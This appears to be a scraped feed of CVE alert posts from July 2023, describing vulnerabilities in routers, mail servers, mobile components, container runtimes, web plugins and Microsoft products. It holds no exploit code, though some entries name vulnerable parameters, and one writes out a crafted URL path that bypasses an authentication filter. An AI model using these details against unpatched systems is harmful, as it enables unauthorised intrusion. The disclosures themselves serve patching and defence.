🚨 CVE-2023-34130SonicWall GMS and Analytics use outdated Tiny Encryption Algorithm (TEA) with a hardcoded key to encrypt sensitive data. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-13 05:58:29 |
🚨 CVE-2023-37566ELECOM wireless LAN routers WRC-1167GHBK3-A v1.24 and earlier, and WRC-1167FEBK-A v1.18 and earlier allow a network-adjacent authenticated attacker to execute an arbitrary command by sending a specially crafted request to the web management page.🎖@cveNotify |
|
| 2023-07-13 05:58:27 |
🚨 CVE-2023-37561Open redirect vulnerability in ELECOM wireless LAN routers and ELECOM wireless LAN repeaters allows a remote unauthenticated attacker to redirect users to arbitrary web sites and conduct phishing attacks via a specially crafted URL. Affected products and versions are as follows: WRH-300WH-H v2.12 and earlier, WTC-300HWH v1.09 and earlier, WTC-C1167GC-B v1.17 and earlier, and WTC-C1167GC-W v1.17 and earlier.🎖@cveNotify |
|
| 2023-07-13 05:58:24 |
🚨 CVE-2023-37568ELECOM wireless LAN routers WRC-1167GHBK-S v1.03 and earlier, and WRC-1167GEBK-S v1.03 and earlier allow a network-adjacent authenticated attacker to execute an arbitrary command by sending a specially crafted request to the web management page.🎖@cveNotify |
|
| 2023-07-13 05:58:21 |
🚨 CVE-2023-34129Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in SonicWall GMS and Analytics allows an authenticated remote attacker to traverse the directory and extract arbitrary files using Zip Slip method to any location on the underlying filesystem with root privileges. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-13 05:58:18 |
🚨 CVE-2023-2190An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.10 before 15.11.10, all versions starting from 16.0 before 16.0.6, all versions starting from 16.1 before 16.1.1. It may be possible for users to view new commits to private projects in a fork created while the project was public.🎖@cveNotify |
|
| 2023-07-13 01:58:31 |
🚨 CVE-2023-34193File Upload vulnerability in Zimbra ZCS 8.8.15 allows an authenticated privileged user to execute arbitrary code and obtain sensitive information via the ClientUploader function.🎖@cveNotify |
|
| 2023-07-13 01:58:30 |
🚨 CVE-2023-34192Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.🎖@cveNotify |
|
| 2023-07-13 01:58:29 |
🚨 CVE-2023-30319Cross Site Scripting (XSS) vulnerability in username field in /src/chatbotapp/LoginServlet.java in wliang6 ChatEngine commit fded8e710ad59f816867ad47d7fc4862f6502f3e, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-13 01:58:25 |
🚨 CVE-2023-29382An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.🎖@cveNotify |
|
| 2023-07-13 01:58:24 |
🚨 CVE-2023-29381An issue in Zimbra Collaboration (ZCS) v.8.8.15 and v.9.0 allows a remote attacker to escalate privileges and obtain sensitive information via the password and 2FA parameters.🎖@cveNotify |
|
| 2023-07-13 01:58:23 |
🚨 CVE-2023-37238Vulnerability of apps' permission to access a certain API being incompletely verified in the wireless projection module. Successful exploitation of this vulnerability may affect some wireless projection features.🎖@cveNotify |
|
| 2023-07-13 01:58:20 |
🚨 CVE-2023-34164Vulnerability of incomplete input parameter verification in the communication framework module. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-07-13 01:58:19 |
🚨 CVE-2023-1691Vulnerability of failures to capture exceptions in the communication framework. Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2023-07-13 01:58:18 |
🚨 CVE-2022-48520Unauthorized access vulnerability in the SystemUI module. Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-07-13 01:58:17 |
🚨 CVE-2022-48519Unauthorized access vulnerability in the SystemUI module. Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-07-13 01:58:14 |
🚨 CVE-2022-48518Vulnerability of signature verification in the iaware system being initialized later than the time when the system broadcasts are sent. Successful exploitation of this vulnerability may cause malicious apps to start upon power-on by spoofing the package names of apps in the startup trustlist, which affects system performance.🎖@cveNotify |
|
| 2023-07-13 01:58:13 |
🚨 CVE-2022-48516Vulnerability that a unique value can be obtained by a third-party app in the DSoftBus module. Successful exploitation of this vulnerability will affect confidentiality.🎖@cveNotify |
|
| 2023-07-13 01:58:12 |
🚨 CVE-2023-27390A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-12 23:58:28 |
🚨 CVE-2023-37062Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the course categories' definition.🎖@cveNotify |
|
| 2023-07-12 23:58:27 |
🚨 CVE-2023-37148TOTOLINK LR350 V9.3.5u.6369_B20220309 was discovered to contain a command injection vulnerability via the ussd parameter in the setUssd function.🎖@cveNotify |
|
| 2023-07-12 23:58:23 |
🚨 CVE-2023-37146TOTOLINK LR350 V9.3.5u.6369_B20220309 was discovered to contain a command injection vulnerability via the FileName parameter in the UploadFirmwareFile function.🎖@cveNotify |
|
| 2023-07-12 23:58:22 |
🚨 CVE-2023-37144Tenda AC10 v15.03.06.26 was discovered to contain a command injection vulnerability via the mac parameter in the function formWriteFacMac.🎖@cveNotify |
|
| 2023-07-12 23:58:21 |
🚨 CVE-2023-3535A vulnerability was found in SimplePHPscripts FAQ Script PHP 2.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-233287.🎖@cveNotify |
|
| 2023-07-12 23:58:17 |
🚨 CVE-2023-3536A vulnerability was found in SimplePHPscripts Funeral Script PHP 3.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233288.🎖@cveNotify |
|
| 2023-07-12 23:58:16 |
🚨 CVE-2023-3538A vulnerability classified as problematic was found in SimplePHPscripts Photo Gallery PHP 2.0. This vulnerability affects unknown code of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. VDB-233290 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-12 23:58:15 |
🚨 CVE-2023-3540A vulnerability, which was classified as problematic, was found in SimplePHPscripts NewsLetter Script PHP 2.4. Affected is an unknown function of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-233292.🎖@cveNotify |
|
| 2023-07-12 20:58:39 |
🚨 CVE-2023-2727Users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers.🎖@cveNotify |
|
| 2023-07-12 20:58:38 |
🚨 CVE-2023-2728Users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with ephemeral containers.🎖@cveNotify |
|
| 2023-07-12 20:58:37 |
🚨 CVE-2021-46894Use After Free (UAF) vulnerability in the uinput module.Successful exploitation of this vulnerability may lead to kernel privilege escalation.🎖@cveNotify |
|
| 2023-07-12 20:58:36 |
🚨 CVE-2021-46892Encryption bypass vulnerability in Maintenance mode. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-07-12 20:58:35 |
🚨 CVE-2023-37239Format string vulnerability in the distributed file system. Attackers who bypass the selinux permission can exploit this vulnerability to crash the program.🎖@cveNotify |
|
| 2023-07-12 20:58:33 |
🚨 CVE-2023-30651Out of bounds read and write in callgetTspsysfs of sysinput HAL service prior to SMR Jul-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-12 20:58:32 |
🚨 CVE-2023-30649Heap out of bound write vulnerability in RmtUimNeedApdu of RILD prior to SMR Jul-2023 Release 1 allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-12 20:58:31 |
🚨 CVE-2023-30653Out of bounds read and write in enableTspDevice of sysinput HAL service prior to SMR Jul-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-12 20:58:30 |
🚨 CVE-2023-30655Improper input validation vulnerability in SCEPProfile prior to SMR Jul-2023 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2023-07-12 20:58:29 |
🚨 CVE-2023-30650Out of bounds read and write in callrunTspCmd of sysinput HAL service prior to SMR Jul-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-12 20:58:27 |
🚨 CVE-2023-30652Out of bounds read and write in callrunTspCmdNoRead of sysinput HAL service prior to SMR Jul-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-12 20:58:26 |
🚨 CVE-2023-30656Improper input validation vulnerability in LSOItemData prior to SMR Jul-2023 Release 1 allows attackers to launch certain activities.🎖@cveNotify |
|
| 2023-07-12 20:58:25 |
🚨 CVE-2020-22336An issue was discovered in pdfcrack 0.17 thru 0.18, allows attackers to execute arbitrary code via a stack overflow in the MD5 function.🎖@cveNotify |
|
| 2023-07-12 20:58:24 |
🚨 CVE-2023-36188An issue in langchain v.0.0.64 allows a remote attacker to execute arbitrary code via the PALChain parameter in the Python exec method.🎖@cveNotify |
|
| 2023-07-12 20:58:22 |
🚨 CVE-2023-36189SQL injection vulnerability in langchain v.0.0.64 allows a remote attacker to obtain sensitive information via the SQLDatabaseChain component.🎖@cveNotify |
|
| 2023-07-12 20:58:21 |
🚨 CVE-2023-36995TravianZ through 8.3.4 allows XSS via the Alliance tag/name, the statistics page, the link preferences, the Admin Logs, or the COOKUSR cookie.🎖@cveNotify |
|
| 2023-07-12 20:58:19 |
🚨 CVE-2023-30648Stack out-of-bounds write vulnerability in IpcRxImeiUpdateImeiNoti of RILD priro to SMR Jul-2023 Release 1 cause a denial of service on the system.🎖@cveNotify |
|
| 2023-07-12 20:58:18 |
🚨 CVE-2021-46896Buffer Overflow vulnerability in PX4-Autopilot allows attackers to cause a denial of service via handler function handling msgid 332.🎖@cveNotify |
|
| 2023-07-12 20:58:17 |
🚨 CVE-2023-30646Heap out of bound write vulnerability in BroadcastSmsConfig of RILD prior to SMR Jul-2023 Release 1 allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-12 14:58:34 |
🚨 CVE-2023-3595Where this vulnerability exists in the Rockwell Automation 1756 EN2* and 1756 EN3* Ethernet/IP communication products, it could allow a malicious user to perform remote code execution with persistence on the target system through maliciously crafted CIP messages. This includes the ability to modify, deny, and exfiltrate data passing through the device.🎖@cveNotify |
|
| 2023-07-12 14:58:33 |
🚨 CVE-2020-20021An issue discovered in MikroTik Router v6.46.3 and earlier allows attacker to cause denial of service via misconfiguration in the SSH daemon.🎖@cveNotify |
|
| 2023-07-12 14:58:32 |
🚨 CVE-2023-24256An issue in the com.nextev.datastatistic component of NIO EC6 Aspen before v3.3.0 allows attackers to escalate privileges via path traversal.🎖@cveNotify |
|
| 2023-07-12 14:58:31 |
🚨 CVE-2023-34150** UNSUPPORTED WHEN ASSIGNED ** Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.🎖@cveNotify |
|
| 2023-07-12 14:58:27 |
🚨 CVE-2023-37454An issue was discovered in the Linux kernel through 6.4.2. A crafted UDF filesystem image causes a use-after-free write operation in the udf_put_super and udf_close_lvid functions in fs/udf/super.c.🎖@cveNotify |
|
| 2023-07-12 14:58:26 |
🚨 CVE-2023-27199PAX Technology A930 PayDroid_7.1.1_Virgo_V04.5.02_20220722 allows attackers to compile a malicious shared library and use LD_PRELOAD to bypass authorization checks.🎖@cveNotify |
|
| 2023-07-12 14:58:25 |
🚨 CVE-2023-27198PAX A930 device with PayDroid_7.1.1_Virgo_V04.5.02_20220722 can allow the execution of arbitrary commands by using the exec service and including a specific word in the command to be executed. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-07-12 14:58:21 |
🚨 CVE-2021-43760Adobe Media Encoder versions 22.0, 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious MOV file.🎖@cveNotify |
|
| 2023-07-12 14:58:20 |
🚨 CVE-2021-44696Adobe Prelude version 22.1.1 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious JPEG file.🎖@cveNotify |
|
| 2023-07-12 14:58:19 |
🚨 CVE-2021-43758Adobe Media Encoder versions 22.0, 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious MP4 file.🎖@cveNotify |
|
| 2023-07-12 14:58:18 |
🚨 CVE-2021-43759Adobe Media Encoder versions 22.0, 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious MP4 file.🎖@cveNotify |
|
| 2023-07-12 14:58:14 |
🚨 CVE-2022-45855SpringEL injection in the metrics source in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7.🎖@cveNotify |
|
| 2023-07-12 14:58:13 |
🚨 CVE-2023-35908Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows unauthorized read access to a DAG through the URL. It is recommended to upgrade to a version that is not affected🎖@cveNotify |
|
| 2023-07-12 14:58:12 |
🚨 CVE-2022-46651Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an unauthorized actor to gain access to sensitive information in Connection edit view. This vulnerability is considered low since it requires someone with access to Connection resources specifically updating the connection to exploit it. Users should upgrade to version 2.6.3 or later which has removed the vulnerability.🎖@cveNotify |
|
| 2023-07-12 00:58:36 |
🚨 CVE-2022-23471containerd is an open source container runtime. A bug was found in containerd's CRI implementation where a user can exhaust memory on the host. In the CRI stream server, a goroutine is launched to handle terminal resize events if a TTY is requested. If the user's process fails to launch due to, for example, a faulty command, the goroutine will be stuck waiting to send without a receiver, resulting in a memory leak. Kubernetes and crictl can both be configured to use containerd's CRI implementation and the stream server is used for handling container IO. This bug has been fixed in containerd 1.6.12 and 1.5.16. Users should update to these versions to resolve the issue. Users unable to upgrade should ensure that only trusted images and commands are used and that only trusted users have permissions to execute commands in running containers.🎖@cveNotify |
|
| 2023-07-12 00:58:35 |
🚨 CVE-2022-39222Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex instances with public clients (and by extension, clients accepting tokens issued by those Dex instances) are affected by this vulnerability if they are running a version prior to 2.35.0. An attacker can exploit this vulnerability by making a victim navigate to a malicious website and guiding them through the OIDC flow, stealing the OAuth authorization code in the process. The authorization code then can be exchanged by the attacker for a token, gaining access to applications accepting that token. Version 2.35.0 has introduced a fix for this issue. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-07-12 00:58:34 |
🚨 CVE-2022-39232Discourse is an open source discussion platform. Starting with version 2.9.0.beta5 and prior to version 2.9.0.beta10, an incomplete quote can generate a JavaScript error which will crash the current page in the browser in some cases. Version 2.9.0.beta10 added a fix and tests to ensure incomplete quotes won't break the app. As a workaround, the quote can be fixed via the rails console.🎖@cveNotify |
|
| 2023-07-12 00:58:33 |
🚨 CVE-2022-39280dparse is a parser for Python dependency files. dparse in versions before 0.5.2 contain a regular expression that is vulnerable to a Regular Expression Denial of Service. All the users parsing index server URLs with dparse are impacted by this vulnerability. A patch has been applied in version `0.5.2`, all the users are advised to upgrade to `0.5.2` as soon as possible. Users unable to upgrade should avoid passing index server URLs in the source file to be parsed.🎖@cveNotify |
|
| 2023-07-12 00:58:32 |
🚨 CVE-2022-39219Bifrost is a middleware package which can synchronize MySQL/MariaDB binlog data to other types of databases. Versions 1.8.6-release and prior are vulnerable to authentication bypass when using HTTP basic authentication. This may allow group members who only have read permissions to write requests when they are normally forbidden from doing so. Version 1.8.7-release contains a patch. There are currently no known workarounds.🎖@cveNotify |
|
| 2023-07-12 00:58:28 |
🚨 CVE-2022-39294conduit-hyper integrates a conduit application with the hyper server. Prior to version 0.4.2, `conduit-hyper` did not check any limit on a request's length before calling [`hyper::body::to_bytes`](https://docs.rs/hyper/latest/hyper/body/fn.to_bytes.html). An attacker could send a malicious request with an abnormally large `Content-Length`, which could lead to a panic if memory allocation failed for that request. In version 0.4.2, `conduit-hyper` sets an internal limit of 128 MiB per request, otherwise returning status 400 ("Bad Request"). This crate is part of the implementation of Rust's [crates.io](https://crates.io/), but that service is not affected due to its existing cloud infrastructure, which already drops such malicious requests. Even with the new limit in place, `conduit-hyper` is not recommended for production use, nor to directly serve the public Internet.🎖@cveNotify |
|
| 2023-07-12 00:58:27 |
🚨 CVE-2022-39284CodeIgniter is a PHP full-stack web framework. In versions prior to 4.2.7 setting `$secure` or `$httponly` value to `true` in `Config\Cookie` is not reflected in `set_cookie()` or `Response::setCookie()`. As a result cookie values are erroneously exposed to scripts. It should be noted that this vulnerability does not affect session cookies. Users are advised to upgrade to v4.2.7 or later. Users unable to upgrade are advised to manually construct their cookies either by setting the options in code or by constructing Cookie objects. Examples of each workaround are available in the linked GHSA.🎖@cveNotify |
|
| 2023-07-12 00:58:26 |
🚨 CVE-2022-23648containerd is a container runtime available as a daemon for Linux and Windows. A bug was found in containerd prior to versions 1.6.1, 1.5.10, and 1.14.12 where containers launched through containerd’s CRI implementation on Linux with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd’s CRI implementation. This bug has been fixed in containerd 1.6.1, 1.5.10, and 1.4.12. Users should update to these versions to resolve the issue.🎖@cveNotify |
|
| 2023-07-12 00:58:25 |
🚨 CVE-2022-23553Alpine is a scaffolding library in Java. Alpine prior to version 1.10.4 allows URL access filter bypass. This issue has been fixed in version 1.10.4. There are no known workarounds.🎖@cveNotify |
|
| 2023-07-12 00:58:21 |
🚨 CVE-2022-23554Alpine is a scaffolding library in Java. Alpine prior to version 1.10.4 allows Authentication Filter bypass. The AuthenticationFilter relies on the request URI to evaluate if the user is accessing the swagger endpoint. By accessing a URL with a path such as /api/foo;%2fapi%2fswagger the contains condition will hold and will return from the authentication filter without aborting the request. Note that the principal object will not be assigned and therefore the issue wont allow user impersonation. This issue has been fixed in version 1.10.4. There are no known workarounds.🎖@cveNotify |
|
| 2023-07-12 00:58:20 |
🚨 CVE-2022-3974A vulnerability classified as critical was found in Axiomatic Bento4. Affected by this vulnerability is the function AP4_StdcFileByteStream::ReadPartial of the file Ap4StdCFileByteStream.cpp of the component mp4info. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213553 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-12 00:58:19 |
🚨 CVE-2022-23633Action Pack is a framework for handling and responding to web requests. Under certain circumstances response bodies will not be closed. In the event a response is *not* notified of a `close`, `ActionDispatch::Executor` will not know to reset thread local state for the next request. This can lead to data being leaked to subsequent requests.This has been fixed in Rails 7.0.2.1, 6.1.4.5, 6.0.4.5, and 5.2.6.1. Upgrading is highly recommended, but to work around this problem a middleware described in GHSA-wh98-p28r-vrc9 can be used.🎖@cveNotify |
|
| 2023-07-12 00:58:18 |
🚨 CVE-2022-23432An improper input validation in SMC_SRPMB_WSM handler of RPMB ldfw prior to SMR Feb-2022 Release 1 allows arbitrary memory write and code execution.🎖@cveNotify |
|
| 2023-07-12 00:58:15 |
🚨 CVE-2021-3979A key length flaw was found in Red Hat Ceph Storage. An attacker can exploit the fact that the key length is incorrectly passed in an encryption algorithm to create a non random key, which is weaker and can be exploited for loss of confidentiality and integrity on encrypted disks.🎖@cveNotify |
|
| 2023-07-12 00:58:14 |
🚨 CVE-2022-22992A command injection remote code execution vulnerability was discovered on Western Digital My Cloud Devices that could allow an attacker to execute arbitrary system commands on the device. The vulnerability was addressed by escaping individual arguments to shell functions coming from user input.🎖@cveNotify |
|
| 2023-07-12 00:58:13 |
🚨 CVE-2022-48521An issue was discovered in OpenDKIM through 2.10.3, and 2.11.x through 2.11.0-Beta2. It fails to keep track of ordinal numbers when removing fake Authentication-Results header fields, which allows a remote attacker to craft an e-mail message with a fake sender address such that programs that rely on Authentication-Results from OpenDKIM will treat the message as having a valid DKIM signature when in fact it has none.🎖@cveNotify |
|
| 2023-07-12 00:58:12 |
🚨 CVE-2023-29406The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.🎖@cveNotify |
|
| 2023-07-11 20:58:32 |
🚨 CVE-2023-34834A Directory Browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.🎖@cveNotify |
|
| 2023-07-11 20:58:31 |
🚨 CVE-2023-35974Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-07-11 20:58:30 |
🚨 CVE-2023-30607icingaweb2-module-jira provides integration with Atlassian Jira. Starting in version 1.3.0 and prior to version 1.3.2, template and field configuration forms perform the deletion action before user input is validated, including the cross site request forgery token. This issue is fixed in version 1.3.2. There are no known workarounds.🎖@cveNotify |
|
| 2023-07-11 20:58:26 |
🚨 CVE-2023-33165Microsoft SharePoint Server Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:25 |
🚨 CVE-2023-21526Windows Netlogon Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:24 |
🚨 CVE-2023-32039Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:20 |
🚨 CVE-2023-32056Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:19 |
🚨 CVE-2023-33127.NET and Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:18 |
🚨 CVE-2023-33170ASP.NET and Visual Studio Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:14 |
🚨 CVE-2023-35318Remote Procedure Call Runtime Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:13 |
🚨 CVE-2023-35313Windows Online Certificate Status Protocol (OCSP) SnapIn Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-11 20:58:12 |
🚨 CVE-2023-35317Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-11 18:58:32 |
🚨 CVE-2023-26861SQL injection vulnerability found in PrestaShop vivawallet v.1.7.10 and before allows a remote attacker to gain privileges via the vivawallet() module.🎖@cveNotify |
|
| 2023-07-11 18:58:31 |
🚨 CVE-2023-28001An insufficient session expiration in Fortinet FortiOS 7.0.0 - 7.0.12 and 7.2.0 - 7.2.4 allows an attacker to execute unauthorized code or commands via reusing the session of a deleted user in the REST API.🎖@cveNotify |
|
| 2023-07-11 18:58:30 |
🚨 CVE-2023-34117Relative path traversal in the Zoom Client SDK before version 5.15.0 may allow an unauthorized user to enable information disclosure via local access.🎖@cveNotify |
|
| 2023-07-11 18:58:26 |
🚨 CVE-2023-36824Redis is an in-memory database that persists on disk. In Redit 7.0 prior to 7.0.12, extracting key names from a command and a list of arguments may, in some cases, trigger a heap overflow and result in reading random heap memory, heap corruption and potentially remote code execution. Several scenarios that may lead to authenticated users executing a specially crafted `COMMAND GETKEYS` or `COMMAND GETKEYSANDFLAGS`and authenticated users who were set with ACL rules that match key names, executing a specially crafted command that refers to a variadic list of key names. The vulnerability is patched in Redis 7.0.12.🎖@cveNotify |
|
| 2023-07-11 18:58:25 |
🚨 CVE-2023-37597Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete user grouplist function.🎖@cveNotify |
|
| 2023-07-11 18:58:24 |
🚨 CVE-2023-3623A vulnerability was found in Suncreate Mountain Flood Disaster Prevention Monitoring and Early Warning System up to 20230704. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Duty/AjaxHandle/UploadHandler.ashx of the component Duty Module. The manipulation of the argument Filedata leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-233576. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-11 18:58:20 |
🚨 CVE-2023-3624A vulnerability classified as critical has been found in Nesote Inout Blockchain FiatExchanger 3.0. This affects an unknown part of the file /index.php/coins/update_marketboxslider of the component POST Parameter Handler. The manipulation of the argument marketcurrency leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-233577 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-11 18:58:19 |
🚨 CVE-2023-32022Windows Server Service Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-11 18:58:18 |
🚨 CVE-2022-41064.NET Framework Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-11 18:58:17 |
🚨 CVE-2022-37026In Erlang/OTP before 23.3.4.15, 24.x before 24.3.4.2, and 25.x before 25.0.2, there is a Client Authentication Bypass in certain client-certification situations for SSL, TLS, and DTLS.🎖@cveNotify |
|
| 2023-07-11 18:58:14 |
🚨 CVE-2023-3515Open Redirect in GitHub repository go-gitea/gitea prior to 1.19.4.🎖@cveNotify |
|
| 2023-07-11 18:58:13 |
🚨 CVE-2023-3133The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.🎖@cveNotify |
|
| 2023-07-11 18:58:12 |
🚨 CVE-2023-2324The Elementor Forms Google Sheet Connector WordPress plugin before 1.0.7, gsheetconnector-for-elementor-forms-pro WordPress plugin through 1.0.7 does not escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-07-11 17:58:35 |
🚨 CVE-2023-25102Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_dmvpn function with the hub_ip and the hub_gre_ip variables.🎖@cveNotify |
|
| 2023-07-11 17:58:34 |
🚨 CVE-2023-25107Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_gre function with the remote_subnet and the remote_mask variables.🎖@cveNotify |
|
| 2023-07-11 17:58:33 |
🚨 CVE-2023-25109Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_gre function with the local_ip variable.🎖@cveNotify |
|
| 2023-07-11 17:58:32 |
🚨 CVE-2023-25106Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_gre function with the local_virtual_ip and the local_virtual_mask variables.🎖@cveNotify |
|
| 2023-07-11 17:58:31 |
🚨 CVE-2023-25108Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_gre function with the remote_ip variable.🎖@cveNotify |
|
| 2023-07-11 17:58:30 |
🚨 CVE-2023-25111Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_gre function with the key variable.🎖@cveNotify |
|
| 2023-07-11 17:58:29 |
🚨 CVE-2023-25110Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_gre function with the remote_virtual_ip variable.🎖@cveNotify |
|
| 2023-07-11 17:58:28 |
